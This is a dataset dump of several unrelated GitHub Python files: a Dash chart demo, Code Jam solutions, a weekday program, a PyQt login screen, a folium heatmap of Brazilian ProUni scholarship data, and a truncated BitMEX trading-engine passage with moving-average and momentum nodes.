ff.write(\"\\n\")\n\n","repo_name":"federicorossifr/wordle-solver","sub_path":"filterWords.py","file_name":"filterWords.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6092867795","text":"import os\nfrom skimage import io\nimport plotly.express as px\nimport matplotlib.pyplot as plt\nimport pyximport\npyximport.install(language_level=3)\n#import dash_interactive_graphviz\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\nfrom sims.sgs import load_SGS\n\nfrom main_sims_places_test import get_maximal_itemsets\nfrom sims.graph_utils import json_to_graphviz\nfrom sims.sims_config import SImS_config\n\n\ndef create_figure(path, name):\n fig = px.imshow(io.imread(path), width=300, )\n fig.update_layout({'hovermode': False, 'margin' : dict(l=20, r=20, t=20, b=20)})\n\n graph = dcc.Graph(id=name, figure=fig, animate=False,\n style={'width': '300px', 'float': 'left', 'display': 'block'},\n config={'displayModeBar': False, 'scrollZoom': True})\n return graph\n\ndef create_figures(n):\n files = os.listdir(os.path.join(config.SGS_dir, 'charts/sgs_eprune_nprune_gspan_05/'))\n figures = []\n i = 0\n for file in files:\n if i >= n: break\n if file.endswith('.jpg'):\n figures.append(create_figure(os.path.join(config.SGS_dir, 'charts/sgs_eprune_nprune_gspan_05/', file),\n f'chart{i}'))\n i += 1\n return figures\n\n\nif __name__ == '__main__':\n # import plotly.graph_objs as go\n # layout = go.Layout(\n # margin=go.layout.Margin(\n # l=0, # left margin\n # r=0, # right margin\n # b=0, # bottom margin\n # t=0 # top margin\n # )\n # )\n\n\n\n config = SImS_config('COCO_subset2')\n config.SGS_params['minsup']=0.05\n fgraphs = load_SGS(config)\n maximal_fgraphs = get_maximal_itemsets(fgraphs)\n\n # components = [html.Div(children=dash_interactive_graphviz.DashInteractiveGraphviz(id=f\"graph{i}\",\n # dot_source=json_to_graphviz(g['g']).source),\n # style = {'width': '200px', 'float': 'left', 'display': 'block'})\n # for i,g in enumerate(maximal_fgraphs)]\n app = dash.Dash(__name__)\n\n\n\n #fig = px.scatter(x=[0, 1, 2, 3, 4], y=[0, 1, 4, 9, 16])\n #fig = plt.scatter(x=[0, 1, 2, 3, 4], y=[0, 1, 4, 9, 16])\n\n # To remove toolbar options:\n # config={\n # 'modeBarButtonsToRemove': ['pan2d', 'lasso2d']\n # }\n\n elements = [\n html.H1(\"SImS, SGS generation.\", style={'text-align': 'center'}),\n html.Div([html.Caption('Select COCO subset:', style={'float':'left', 'width':'300px'}), html.Textarea()], style={'width':'800px'}),\n html.H1(\"SImS, SGS exploration.\", style={'text-align' : 'center'}),\n dcc.Dropdown(id='choice', options=[{'label':'5', 'value':5},{'label':'10', 'value':10}],\n value=5, multi=False),\n html.Div(create_figures(5), id='figuresDiv')\n ]\n\n app.layout = html.Div(elements)\n\n @app.callback(\n [Output(component_id='figuresDiv', component_property='children')],\n [Input(component_id='choice', component_property='value')]\n )\n def update_graph(option):\n return (create_figures(option),)\n\n\n app.run_server(debug=True)","repo_name":"AndreaPasini/panoptic-segmentation","sub_path":"main_sims_DEMO.py","file_name":"main_sims_DEMO.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23588264641","text":"T = int(input())\n\nfor t in range(T):\n N, K = list(map(int, input().split()))\n u = float(input())\n p = list(map(float, input().split()))\n p = sorted(p)\n p.append(1.)\n last_p = p[0]\n for i in range(1, N+1):\n dif = min(p[i] - last_p, u/i)\n u -= dif*i\n last_p += dif\n #print(dif, last_p)\n if u < 0.0000001 or i == N:\n for j in range(i):\n p[j] = last_p\n break\n\n p = p[:-1]\n ans = 1.\n for x in p:\n ans *= x\n\n print('Case #{0:d}: {1:.10f}'.format(t+1, ans))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_211/196.py","file_name":"196.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7857314047","text":"from datetime import datetime\nimport time\n\nen_de = {\"Monday\" : \"Montach\",\"Tuesday\" : \"Dienstach\",\"Wednesday\":\"Medig\", \"Thursday\":\"Donschtig\",\"Friday\":\"Freitach\",\"Saturday\":\"Sonnabend\",\"Sunday\":\"Sonntach\"}\n\nprint(\"Hey Bruder! Du sagst mir Datum. Ich sag dir Tag!\\n\")\nprint(\"Sagst du Datum!\\n\")\ny = int(input(\"Jahr: \"))\nm = int(input(\"Monat: \"))\nt = int(input(\"Tag: \"))\n\nprint(\"\\nGib mir 5 Sekunden.\\n\")\nfor i in range(0,5):\n\ttime.sleep(1)\n\tprint(i+1)\ntime.sleep(1)\n\ndate = datetime(y, m, t)\nx = date.strftime(\"%A\")\n\nprint(\"\\nResultat: %s. Üsch schwööör!\"%(en_de[x]))\n\n\n\n\n\n\n","repo_name":"thstoet/Unit_Test","sub_path":"05_Programs/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23625857391","text":"#!/usr/local/bin/python2.7\n# -*- coding: utf-8 -*-\n\nimport sys\n\ndef debug(a): sys.stderr.write(str(a) + '\\n')\ndef readarray(foo): return [foo(e) for e in raw_input().split()]\ndef readint(): return int(raw_input().strip())\n\ndebug = lambda x: x\n\ndef calc(data, D):\n results = []\n for i in xrange(len(data)):\n for j in xrange(i + 1, len(data) + 1):\n some_range = data[i:j]\n expected = (sum(e[1] for e in some_range) - 1) * D\n positions = [e[0] for e in some_range]\n actual = max(positions) - min(positions)\n results.append((expected - actual) / 2.0)\n return max(results)\n\nT = readint()\nfor i in xrange(T):\n C, D = readarray(int)\n data = []\n for j in xrange(C):\n P, V = readarray(int)\n data.append((P, V))\n data.sort(key=lambda x: x[0])\n debug(data)\n print('Case #{0}: {1}'.format(i + 1, calc(data, D)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_82/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29670319607","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel\nfrom PyQt5.QtCore import QCoreApplication\nfrom PyQt5.QtGui import QPixmap\nimport login\nimport join\n\nclass startApp(QWidget):\n def __init__(self):\n super().__init__()\n self.initUi()\n\n def initUi(self):\n self.back = QLabel(self)\n self.back.setGeometry(0, 1, 851, 1201)\n self.pixmap = QPixmap(\"image/back_image/start_back.jpg\")\n self.back.setPixmap(self.pixmap)\n\n self.login_lb = QLabel(self)\n self.login_lb.move(220, 500)\n self.pixmap = QPixmap(\"image/btn_image/login_btn.png\")\n self.login_lb.setPixmap(self.pixmap)\n\n self.join_lb = QLabel(self)\n self.join_lb.move(220, 750)\n self.pixmap = QPixmap(\"image/btn_image/join_btn.png\")\n self.join_lb.setPixmap(self.pixmap)\n\n loginbtn = QPushButton(self)\n loginbtn.clicked.connect(self.clickLoginBtn)\n loginbtn.setStyleSheet(\"background-color:rgb(0,0,0,0);\")\n loginbtn.resize(550, 150)\n loginbtn.move(220, 500)\n\n joinbtn = QPushButton(self)\n joinbtn.clicked.connect(self.clickJoinBtn)\n joinbtn.setStyleSheet(\"background-color:rgb(0,0,0,0);\")\n joinbtn.resize(550, 150)\n joinbtn.move(220, 750)\n\n self.resize(850, 1200)\n self.show()\n\n def clickLoginBtn(self):\n self.close()\n self.l = login.Login()\n\n def clickJoinBtn(self):\n self.close()\n self.l = join.Join()","repo_name":"calmPOTATO/Pocket_kiosk","sub_path":"appStart.py","file_name":"appStart.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72397800834","text":"import pandas as pd\nimport seaborn as sns\nimport folium\nfrom folium import plugins\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom unicodedata import normalize\nimport os\n\nPROUNI_FILE = 'pda-prouni-2016.csv'\nMUNICIPIOS_FILE = 'MunicipiosBrasil.csv'\n\nENCODING = 'ISO-8859-1'\n\nSEP = ';'\n\nMUN_MUNICIPIO_COL = 'MUNICIPIO'\nMUN_UF_COL = 'UF'\nMUN_LATITUDE_COL = 'LATITUDE'\nMUN_LONGITUDE_COL = 'LONGITUDE'\n\nPRO_MUNICIPIO_BENEFICIARIO_BOLSA_COL = 'MUNICIPIO_BENEFICIARIO_BOLSA'\n\nQUANTIDADE_OCORRENCIAS_CIDADE_COL = 'QUANTIDADE_OCORRENCIAS_CIDADE'\n\nLATITUDE_PAIS = -15.788497\nLONGITUDE_PAIS = -47.879873\n\nFILE_PATH = os.getcwd() + \"\\\\\"\n\ndef remover_acentos(txt):\n return normalize('NFKD', txt).encode('ASCII', 'ignore').decode('ASCII')\n\nprouni_2016 = pd.read_csv(FILE_PATH + PROUNI_FILE, \n sep = SEP, \n encoding = ENCODING)\n\nmunicipios_brasil = pd.read_csv(FILE_PATH + MUNICIPIOS_FILE, \n usecols = [MUN_MUNICIPIO_COL, \n MUN_UF_COL, \n MUN_LATITUDE_COL, \n MUN_LONGITUDE_COL], \n sep = SEP, \n encoding = ENCODING)\n\nprouni_2016 = prouni_2016.fillna('')\n\nmunicipios_brasil = municipios_brasil.fillna('')\n\nmunicipios_brasil[MUN_LATITUDE_COL] = municipios_brasil[MUN_LATITUDE_COL].apply(lambda x: (x.replace(',','.'))\n .strip())\n\nmunicipios_brasil[MUN_LATITUDE_COL] = municipios_brasil[MUN_LATITUDE_COL].astype(float)\n\nmunicipios_brasil[MUN_LONGITUDE_COL] = municipios_brasil[MUN_LONGITUDE_COL].apply(lambda x: (x.replace(',','.')).strip())\n\nmunicipios_brasil[MUN_LONGITUDE_COL] = municipios_brasil[MUN_LONGITUDE_COL].astype(float)\n\nprouni_2016[PRO_MUNICIPIO_BENEFICIARIO_BOLSA_COL] = prouni_2016[\n PRO_MUNICIPIO_BENEFICIARIO_BOLSA_COL\n].apply(lambda x: remover_acentos(x))\n\ndf_gerar_mapa = pd.merge(prouni_2016.drop_duplicates(), \n municipios_brasil.drop_duplicates(), \n left_on = ['MUNICIPIO_BENEFICIARIO_BOLSA', 'SIGLA_UF_BENEFICIARIO_BOLSA'], \n right_on = [MUN_MUNICIPIO_COL, MUN_UF_COL], \n how = 'left')\n\ndf_gerar_mapa = df_gerar_mapa[(~df_gerar_mapa[MUN_LATITUDE_COL].isnull()) \n | (~df_gerar_mapa[MUN_LONGITUDE_COL].isnull())]\n\ndf_municipio_bolsa = df_gerar_mapa.assign(QUANTIDADE_OCORRENCIAS_CIDADE = \n df_gerar_mapa.groupby(PRO_MUNICIPIO_BENEFICIARIO_BOLSA_COL)\n .MUNICIPIO_BENEFICIARIO_BOLSA.transform('count'))\n\ndf_municipio_bolsa = df_municipio_bolsa.sort_values(\n [QUANTIDADE_OCORRENCIAS_CIDADE_COL, \n PRO_MUNICIPIO_BENEFICIARIO_BOLSA_COL], \n ascending = [True, False])\n\ncoordenadas = []\nlat = df_municipio_bolsa[MUN_LATITUDE_COL][:500].values\nlong = df_municipio_bolsa[MUN_LONGITUDE_COL][:500].values\n\nmapa = folium.Map(\n location = [LATITUDE_PAIS, LONGITUDE_PAIS], \n tiles = 'Stamen Toner', \n zoom_start = 4)\n\nfor la, lo in zip(lat, long):\n coordenadas.append([la, lo])\n\nmapa.add_child(plugins.HeatMap(coordenadas))\n\nmapa","repo_name":"ibragionp/analise_de_dados_mec","sub_path":"analise_dados_mec_2016.py","file_name":"analise_dados_mec_2016.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40745972214","text":"#! /usr/bin/env python3.9\n\n########################################################################################################################\n# Imports\n########################################################################################################################\n\nimport argparse\nimport asyncio\nfrom collections import defaultdict, deque, OrderedDict\nfrom dataclasses import dataclass\nfrom enum import IntEnum\nfrom getpass import getpass\nimport json\nimport logging\nimport math\nfrom pathlib import Path\nimport re\nimport time\nfrom typing import Any, Callable, Generic, Optional, TypeVar, Union\n\nimport bitmex # type: ignore[import]\nfrom bitmex_websocket import BitMEXWebsocket # type: ignore[import]\n\n\n########################################################################################################################\n# Globals\n########################################################################################################################\n\nlogger = logging.getLogger(__name__)\n\n\n########################################################################################################################\n# Utilities\n########################################################################################################################\n\nBASE64URL_PATTERN = re.compile(r'^[-0-9A-Z_a-z]+$')\nTICKER_BASIC_SYMBOL_PATTERN = re.compile(r'^[A-Z]+$')\nTICKER_EXTENDED_SYMBOL_PATTERN = re.compile(r'^[A-Za-z]+$')\n\n\ndef assert_base64url(value: Any) -> str:\n assert isinstance(value, str) and BASE64URL_PATTERN.match(value)\n return value\n\n\ndef assert_bool(value: Any) -> bool:\n assert isinstance(value, bool)\n return value\n\n\ndef assert_diminishing_multiplier(value: Any) -> float:\n assert isinstance(value, float) and 0. < value < 1.\n return value\n\n\ndef assert_non_diminishing_multiplier(value: Any) -> float:\n assert isinstance(value, float) and value >= 1.\n return value\n\n\ndef assert_non_negative_integer(value: Any) -> int:\n assert isinstance(value, int) and value >= 0\n return value\n\n\ndef assert_positive_integer(value: Any) -> int:\n assert isinstance(value, int) and value > 0\n return value\n\n\ndef assert_positive_percentage(value: Any) -> float:\n assert isinstance(value, float) and 0. < value <= 1.\n return value\n\n\ndef assert_positive_real(value: Any) -> float:\n assert isinstance(value, float) and value > 0.\n return value\n\n\ndef assert_ticker_basic_symbol(value: Any) -> str:\n assert isinstance(value, str) and TICKER_BASIC_SYMBOL_PATTERN.match(value)\n return value\n\n\ndef assert_ticker_extended_symbol(value: Any) -> str:\n assert isinstance(value, str) and TICKER_EXTENDED_SYMBOL_PATTERN.match(value)\n return value\n\n\n########################################################################################################################\n# Types\n########################################################################################################################\n\nclass Signal(IntEnum):\n BUY = 1\n SELL = -1\n CLOSE = 0\n BUYCLOSE = -1\n SELLCLOSE = 1\n\n\n@dataclass(order=True, frozen=True)\nclass OrderBookLevel:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('price', 'volume')\n\n price: float\n volume: int\n\n\n@dataclass(frozen=True)\nclass L2OrderBookTick:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('monotonic_timestamp_ns', 'midpoint_price', 'bids', 'asks')\n\n monotonic_timestamp_ns: int\n midpoint_price: float\n bids: list[OrderBookLevel]\n asks: list[OrderBookLevel]\n\n\n@dataclass(frozen=True)\nclass HackyMcHackface:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('midpoint_price', 'best_bid', 'best_ask')\n\n midpoint_price: float\n best_bid: Optional[float]\n best_ask: Optional[float]\n\n\n@dataclass(frozen=True)\nclass ExponentialMovingAverageResult:\n __slots__ = ('current_value', 'best_bid', 'best_ask', 'mean', 'variance', 'sma_mean', 'sma_variance')\n\n current_value: float\n best_bid: Optional[float]\n best_ask: Optional[float]\n mean: float\n variance: float\n sma_mean: float\n sma_variance: float\n\n\n########################################################################################################################\n# Nodes\n########################################################################################################################\n\nNCT = TypeVar('NCT')\nNRT = TypeVar('NRT')\n\n\nclass Node(Generic[NCT, NRT]):\n __slots__ = ('engine', 'config')\n\n def __init__(self, engine: 'Engine', config: NCT) -> None:\n self.engine = engine\n self.config = config\n\n def publish_result(self, result: NRT) -> None:\n logger.debug(f'Publishing {result} from node for {self.config}.')\n self.engine.publish_node_result(self, result)\n\n\n# Absolute duration (in seconds) between when a timer tick is scheduled and when it is invoked, above which a warning\n# will be emitted.\nTIMER_TICK_EPSILON = 0.02\n\n\n@dataclass(frozen=True)\nclass TimerNodeConfig:\n __slots__ = ('duration',)\n\n duration: float\n\n def __post_init__(self) -> None:\n assert_positive_real(self.duration)\n\n\nclass TimerNode(Node[TimerNodeConfig, int]):\n __slots__ = ('epoch_timestamp', 'next_tick_timestamp', 'ticks')\n\n def __init__(self, engine: 'Engine', config: TimerNodeConfig) -> None:\n super().__init__(engine, config)\n self.epoch_timestamp = engine.loop.time()\n self.ticks = 0\n self.schedule_next_tick()\n\n def schedule_next_tick(self) -> None:\n current_timestamp = self.engine.loop.time()\n next_tick = self.ticks + 1\n self.next_tick_timestamp = self.epoch_timestamp + (self.config.duration * next_tick)\n delta = current_timestamp - self.next_tick_timestamp\n if delta > 0:\n logger.warning(f'Next tick #{next_tick} (from node for {self.config}) is late by {delta} s!')\n self.engine.loop.call_at(self.next_tick_timestamp, self.handle_tick)\n\n def handle_tick(self) -> None:\n current_timestamp = self.engine.loop.time()\n delta = current_timestamp - self.next_tick_timestamp\n is_late = abs(delta) > TIMER_TICK_EPSILON\n\n self.ticks += 1\n\n message = f'Scheduled tick #{self.ticks} (from node for {self.config}) invoked '\n if delta == 0:\n message += 'on time!'\n else:\n message += f'''{abs(delta)} s ({'>' if is_late else '≤'} {TIMER_TICK_EPSILON} s) {'late' if delta >= 0 else 'early'}.'''\n if is_late:\n logger.warning(message)\n else:\n logger.debug(message)\n\n self.publish_result(self.ticks)\n self.schedule_next_tick()\n\n\n@dataclass(frozen=True)\nclass L2OrderBookTickNodeConfig:\n __slots__ = ()\n\n\nclass L2OrderBookTickNode(Node[L2OrderBookTickNodeConfig, L2OrderBookTick]):\n __slots__ = ()\n\n def __init__(self, engine: 'Engine', config: L2OrderBookTickNodeConfig) -> None:\n super().__init__(engine, config)\n engine.loop.create_task(self.drain_queue())\n\n async def drain_queue(self) -> None:\n while True:\n tick = await self.engine.l2_order_book_tick_queue.get()\n self.publish_result(tick)\n\n\n@dataclass(frozen=True)\nclass DiscretisedL2OrderBookTickNodeConfig:\n __slots__ = ('duration',)\n\n duration: float\n\n def __post_init__(self) -> None:\n assert_positive_real(self.duration)\n\n\nclass DiscretisedL2OrderBookTickNode(Node[DiscretisedL2OrderBookTickNodeConfig, L2OrderBookTick]):\n __slots__ = ('last_timer_tick', 'last_l2_order_book_tick')\n\n def __init__(self, engine: 'Engine', config: DiscretisedL2OrderBookTickNodeConfig) -> None:\n super().__init__(engine, config)\n self.last_timer_tick: Optional[int] = None\n self.last_l2_order_book_tick: Optional[L2OrderBookTick] = None\n engine.subscribe_node_result(TimerNodeConfig(duration=config.duration), self.handle_timer_tick)\n engine.subscribe_node_result(L2OrderBookTickNodeConfig(), self.handle_l2_order_book_tick)\n\n def handle_timer_tick(self, tick: int) -> None:\n assert self.last_timer_tick is None or tick == self.last_timer_tick + 1\n self.last_timer_tick = tick\n if self.last_l2_order_book_tick is not None:\n self.publish_result(self.last_l2_order_book_tick)\n\n def handle_l2_order_book_tick(self, tick: L2OrderBookTick) -> None:\n self.last_l2_order_book_tick = tick\n\n\n@dataclass(frozen=True)\nclass MidpointPriceNodeConfig:\n __slots__ = ('l2_order_book_tick_node_config',)\n\n l2_order_book_tick_node_config: Union[L2OrderBookTickNodeConfig, DiscretisedL2OrderBookTickNodeConfig]\n\n\nclass MidpointPriceNode(Node[MidpointPriceNodeConfig, HackyMcHackface]):\n __slots__ = ()\n\n def __init__(self, engine: 'Engine', config: MidpointPriceNodeConfig) -> None:\n super().__init__(engine, config)\n engine.subscribe_node_result(config.l2_order_book_tick_node_config, self.handle_l2_order_book_tick)\n\n def handle_l2_order_book_tick(self, tick: L2OrderBookTick) -> None:\n best_bid = tick.bids[0].price if len(tick.bids) > 0 else None\n best_ask = tick.asks[0].price if len(tick.asks) > 0 else None\n self.publish_result(HackyMcHackface(midpoint_price=tick.midpoint_price, best_bid=best_bid, best_ask=best_ask))\n\n\n@dataclass(frozen=True)\nclass ExponentialMovingAverageNodeConfig:\n __slots__ = ('node_config', 'alpha', 'sma_lookback')\n\n node_config: Any\n alpha: float\n sma_lookback: int\n\n def __post_init__(self) -> None:\n assert_diminishing_multiplier(self.alpha)\n assert_positive_integer(self.sma_lookback)\n\n\nclass ExponentialMovingAverageNode(Node[ExponentialMovingAverageNodeConfig, ExponentialMovingAverageResult]):\n __slots__ = ('a', 'n', 'count', 'mean', 'variance', 'values', 'sma_sum')\n\n def __init__(self, engine: 'Engine', config: ExponentialMovingAverageNodeConfig) -> None:\n super().__init__(engine, config)\n self.a = 1 - config.alpha\n self.n = math.ceil((2 / config.alpha) - 1)\n self.count = 0\n self.mean: Optional[float] = None\n self.variance = 0.\n self.values: deque[NRT] = deque(maxlen=config.sma_lookback)\n self.sma_sum = 0.\n engine.subscribe_node_result(config.node_config, self.handle_value)\n\n def handle_value(self, hacky_value: HackyMcHackface) -> None:\n value = hacky_value.midpoint_price\n self.count += 1\n if self.count == 1:\n assert self.mean is None\n self.mean = value\n else:\n assert self.mean is not None\n # See .\n delta = value - self.mean\n increment = self.config.alpha * delta\n self.mean += increment\n self.variance = self.a * (self.variance + (delta * increment))\n\n if len(self.values) == self.values.maxlen:\n self.sma_sum -= self.values[0]\n self.values.append(value)\n self.sma_sum += value\n\n if self.count >= self.n and self.count >= self.config.sma_lookback:\n sma_mean = self.sma_sum / self.config.sma_lookback\n sma_variance = sum((value - sma_mean) ** 2 for value in self.values) / (self.config.sma_lookback - 1)\n self.publish_result(ExponentialMovingAverageResult(current_value=value, best_bid=hacky_value.best_bid, best_ask=hacky_value.best_ask, mean=self.mean, variance=self.variance, sma_mean=sma_mean, sma_variance=sma_variance))\n\n\n########################################################################################################################\n# Engine\n########################################################################################################################\n\n@dataclass(frozen=True)\nclass EngineConfig:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('symbol', 'base_currency', 'quote_currency', 'account_currency', 'settlement_currency', 'leverage', 'position_currency')\n\n # Ticker symbol.\n symbol: str\n # Base currency symbol.\n base_currency: str\n # Quote currency symbol.\n quote_currency: str\n # Account currency symbol. When orders are executed, we spend or receive from this wallet.\n account_currency: str\n # Settlement currency symbol. When orders are executed, we spend or receive in this currency.\n settlement_currency: str\n # Leverage ratio, for margin trading.\n leverage: float\n # Position currency symbol. When orders are executed, our position in this currency changes.\n position_currency: str\n\n def __post_init__(self) -> None:\n assert_ticker_basic_symbol(self.symbol)\n assert_ticker_basic_symbol(self.base_currency)\n assert_ticker_basic_symbol(self.quote_currency)\n assert f'{self.base_currency}{self.quote_currency}' == self.symbol\n assert_ticker_extended_symbol(self.account_currency)\n assert_ticker_extended_symbol(self.settlement_currency)\n assert self.settlement_currency.upper() == self.quote_currency\n assert self.settlement_currency == self.account_currency\n assert_non_diminishing_multiplier(self.leverage)\n assert_ticker_basic_symbol(self.position_currency)\n assert self.position_currency == self.base_currency\n\n\nclass Engine:\n __slots__ = ('config', 'loop', 'l2_order_book_tick_queue', 'node_type_registry', 'node_registry', 'node_subscriptions')\n\n def __init__(self, config: EngineConfig) -> None:\n self.config = config\n self.loop = asyncio.get_event_loop()\n self.l2_order_book_tick_queue: asyncio.Queue[L2OrderBookTick] = asyncio.Queue()\n self.node_type_registry: dict[type[Any], type[Node]] = {}\n self.node_registry: dict[Any, Node] = {}\n self.node_subscriptions: dict[Node, set[Callable[[Any], None]]] = defaultdict(set)\n\n self.register_node_type(TimerNodeConfig, TimerNode)\n self.register_node_type(L2OrderBookTickNodeConfig, L2OrderBookTickNode)\n self.register_node_type(DiscretisedL2OrderBookTickNodeConfig, DiscretisedL2OrderBookTickNode)\n self.register_node_type(MidpointPriceNodeConfig, MidpointPriceNode)\n self.register_node_type(ExponentialMovingAverageNodeConfig, ExponentialMovingAverageNode)\n\n def register_node_type(self, config_cls: type[NCT], node_cls: type[Node[NCT, Any]]) -> None:\n assert config_cls not in self.node_type_registry, f'Cannot register {config_cls} to {node_cls} as it is already registered to {self.node_type_registry[config_cls]}'\n logger.debug(f'Registering {config_cls} to {node_cls}.')\n self.node_type_registry[config_cls] = node_cls\n\n def get_node(self, config: NCT) -> Node[NCT, Any]:\n config_cls = type(config)\n assert config_cls in self.node_type_registry, f'Cannot get node for {config} as {config_cls} is not registered'\n if config in self.node_registry:\n logger.debug(f'Returning existing node for {config}.')\n return self.node_registry[config]\n else:\n logger.info(f'Creating new node for {config}.')\n node_cls = self.node_type_registry[config_cls]\n node = node_cls(self, config)\n self.node_registry[config] = node\n return node\n\n def subscribe_node_result(self, config: NCT, handler: Callable[[NRT], None]) -> None:\n node = self.get_node(config)\n handlers = self.node_subscriptions[node]\n if handler in handlers:\n logger.warning(f'{handler} is already subscribed to node for {config}!')\n else:\n logger.info(f'Subscribing {handler} to node for {config}.')\n handlers.add(handler)\n\n def publish_node_result(self, node: Node[Any, NRT], result: NRT) -> None:\n for handler in self.node_subscriptions[node]:\n logger.debug(f'Scheduling callback to {handler} with {result}.')\n self.loop.call_soon(handler, result)\n\n def run(self) -> None:\n self.loop.run_forever()\n\n\n########################################################################################################################\n# Exchange\n########################################################################################################################\n\n@dataclass(frozen=True)\nclass BitmexExchangeConfig:\n # TODO: Use `@dataclass(slots=True)` once we're on Python 3.10.\n __slots__ = ('is_live', 'api_key', 'api_secret')\n\n # `True` if we're trading on the live exchange, otherwise `False` if we're trading on the simulated exchange.\n is_live: bool\n # BitMEX API key ID.\n api_key: str\n # BitMEX API key secret.\n api_secret: str\n\n def __post_init__(self) -> None:\n assert_bool(self.is_live)\n assert_base64url(self.api_key)\n assert_base64url(self.api_secret)\n\n\nclass BitmexExchange:\n __slots__ = ('client', 'ws')\n\n def __init__(self, engine: Engine, config: BitmexExchangeConfig) -> None:\n self.client = bitmex.bitmex(\n test=not config.is_live,\n api_key=config.api_key,\n api_secret=config.api_secret,\n )\n\n def l2_order_book_tick_queue_putter(tick: L2OrderBookTick):\n \"\"\"\n This func is assigned to self.ws.l2_order_book_tick_queue_putter so\n data passed to engine\n \"\"\"\n engine.loop.call_soon_threadsafe(engine.l2_order_book_tick_queue.put_nowait, tick)\n\n def connect() -> None:\n self.ws = BitmexWebsocketEx(\n engine_config=engine.config,\n l2_order_book_tick_queue_putter=l2_order_book_tick_queue_putter,\n on_close=reconnect,\n endpoint=f'''wss://ws.{'' if config.is_live else 'testnet.'}bitmex.com/realtime''',\n symbol=engine.config.symbol,\n api_key=config.api_key,\n api_secret=config.api_secret,\n subscriptions=(\n 'instrument',\n 'orderBookL2',\n 'quote',\n 'trade',\n 'execution',\n 'order',\n 'margin',\n 'position',\n 'wallet',\n )\n )\n\n def reconnect() -> None:\n logger.warning('Websocket closed! Will reconnect.')\n connect()\n\n connect()\n\n\nclass BitmexWebsocketEx(BitMEXWebsocket):\n __slots__ = ('engine_config', 'l2_order_book_tick_queue_putter', 'on_close')\n\n def __init__(self, engine_config: EngineConfig, l2_order_book_tick_queue_putter: Callable[[L2OrderBookTick], None], on_close: Callable[[], None], *args, **kwargs) -> None:\n self.engine_config = engine_config\n self.l2_order_book_tick_queue_putter = l2_order_book_tick_queue_putter\n self.on_close = on_close\n super().__init__(*args, **kwargs)\n\n def _BitMEXWebsocket__on_message(self, message: str) -> None:\n monotonic_timestamp_ns = time.monotonic_ns()\n super()._BitMEXWebsocket__on_message(message)\n deserialised_message = json.loads(message) # TODO: Avoid double deserialisation.\n if deserialised_message.get('action'):\n table = deserialised_message.get('table')\n if table == 'orderBookL2':\n self.__put_l2_order_book_tick_exchange_event(monotonic_timestamp_ns)\n\n def _BitMEXWebsocket__on_close(self) -> None:\n super()._BitMEXWebsocket__on_close()\n self.on_close()\n\n def __put_l2_order_book_tick_exchange_event(self, monotonic_timestamp_ns: int) -> None:\n data = self.data['orderBookL2']\n bids = sorted((\n OrderBookLevel(price=datum['price'], volume=datum['size'])\n for datum in data\n if datum['symbol'] == self.engine_config.symbol and datum['side'] == 'Buy'\n ), reverse=True)\n asks = sorted((\n OrderBookLevel(price=datum['price'], volume=datum['size'])\n for datum in data\n if datum['symbol'] == self.engine_config.symbol and datum['side'] == 'Sell'\n ))\n midpoint_price = (bids[0].price + asks[0].price) / 2\n l2_order_book_tick = L2OrderBookTick(\n monotonic_timestamp_ns=monotonic_timestamp_ns,\n midpoint_price=midpoint_price,\n bids=bids,\n asks=asks,\n )\n self.l2_order_book_tick_queue_putter(l2_order_book_tick)\n\n\n########################################################################################################################\n# Strategy\n########################################################################################################################\n\n@dataclass(frozen=True)\nclass MomentumIndicatorResult:\n __slots__ = ('midpoint_price', 'best_bid', 'best_ask', 'momentum', 'significance', 'sma_variance', 'upper', 'lower', 'upper1', 'lower1')\n\n midpoint_price: float\n best_bid: Optional[float]\n best_ask: Optional[float]\n momentum: float\n significance: float\n sma_variance: float\n upper: float\n lower: float\n upper1: float\n lower1: float\n\n\n@dataclass(frozen=True)\nclass MomentumIndicatorNodeConfig:\n __slots__ = ('half_life', 'Multiplier')\n\n half_life: int\n Multiplier: float\n\n def __post_init__(self) -> None:\n assert_positive_integer(self.half_life)\n\n\nclass MomentumIndicatorNode(Node[MomentumIndicatorNodeConfig, MomentumIndicatorResult]):\n __slots__ = ('magic_constant',)\n\n def __init__(self, engine: 'Engine', config: MomentumIndicatorNodeConfig) -> None:\n super().__init__(engine, config)\n self.magic_constant = 2 * math.log(2) / config.half_life\n l2_order_book_tick_node_config = DiscretisedL2OrderBookTickNodeConfig(duration=120.)\n mpp_node_config = MidpointPriceNodeConfig(l2_order_book_tick_node_config=l2_order_book_tick_node_config)\n alpha = 2 / (config.half_life + 1)\n ema_node_config = ExponentialMovingAverageNodeConfig(node_config=mpp_node_config, alpha=alpha, sma_lookback=config.half_life)\n engine.subscribe_node_result(ema_node_config, self.handle_ema_result)\n\n def handle_ema_result(self, ema_result: ExponentialMovingAverageResult) -> None:\n upper = ema_result.sma_mean + self.config.Multiplier * math.sqrt(ema_result.sma_variance)\n lower = 